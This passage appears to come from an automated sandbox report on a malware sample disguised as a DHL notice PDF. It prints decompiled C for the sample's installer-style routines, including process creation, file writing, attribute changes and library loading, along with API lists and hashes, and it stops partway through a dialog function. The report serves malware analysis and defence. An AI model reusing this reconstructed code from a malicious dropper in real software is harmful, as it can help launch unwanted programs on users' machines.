					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                            0x0040138a
                                                            0x004013fa
                                                            0x0040139b
                                                            0x004013a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004013a2
                                                            0x004013a3
                                                            0x004013ad
                                                            0x00000000
                                                            0x00401404
                                                            0x004013b0
                                                            0x004013b7
                                                            0x004013bd
                                                            0x004013be
                                                            0x004013c0
                                                            0x004013c2
                                                            0x004013b9
                                                            0x004013b9
                                                            0x004013ba
                                                            0x004013ba
                                                            0x004013c9
                                                            0x004013cb
                                                            0x004013f4
                                                            0x004013f4
                                                            0x004013c9
                                                            0x00000000

                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                            0x00405c54
                                                            0x00405c74
                                                            0x00405c7c
                                                            0x00405c81
                                                            0x00000000
                                                            0x00405c87
                                                            0x00405c8b

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-0
                                                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                            0x00406a3d
                                                            0x00406a40
                                                            0x00406a47
                                                            0x00406a4f
                                                            0x00406a5b
                                                            0x00000000
                                                            0x00406a62
                                                            0x00406a52
                                                            0x00406a59
                                                            0x00000000
                                                            0x00406a6a
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                            0x0040615c
                                                            0x00406169
                                                            0x0040617e
                                                            0x00406184

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 0040615C
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                            0x00406138
                                                            0x0040613e
                                                            0x00406143
                                                            0x0040614c
                                                            0x0040614c
                                                            0x00406155

                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                            0x00405c1c
                                                            0x00405c24
                                                            0x00000000
                                                            0x00405c2a
                                                            0x00000000

                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                            • GetLastError.KERNEL32 ref: 00405C2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                            0x0040620e
                                                            0x0040621e
                                                            0x00406226
                                                            0x00000000
                                                            0x0040622d
                                                            0x00000000
                                                            0x0040622f

                                                            APIs
                                                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040F21D,0040CEF0,00403579,0040CEF0,0040F21D,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                            0x004061df
                                                            0x004061ef
                                                            0x004061f7
                                                            0x00000000
                                                            0x004061fe
                                                            0x00000000
                                                            0x00406200

                                                            APIs
                                                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                            0x00403606
                                                            0x0040360c

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                            0x00401faa
                                                            0x00401faf
                                                            0x00401fb5
                                                            0x00401fba
                                                            0x00401fbe
                                                            0x0040292e
                                                            0x00401fc4
                                                            0x00401fc7
                                                            0x00401fca
                                                            0x00401fd2
                                                            0x00401fe1
                                                            0x00401fe3
                                                            0x00401fe3
                                                            0x00401fd4
                                                            0x00401fd8
                                                            0x00401fd8
                                                            0x00401fd2
                                                            0x00401fea
                                                            0x00401feb
                                                            0x00401feb
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                            • String ID:
                                                            • API String ID: 2972824698-0
                                                            • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                            • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 95%
                                                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
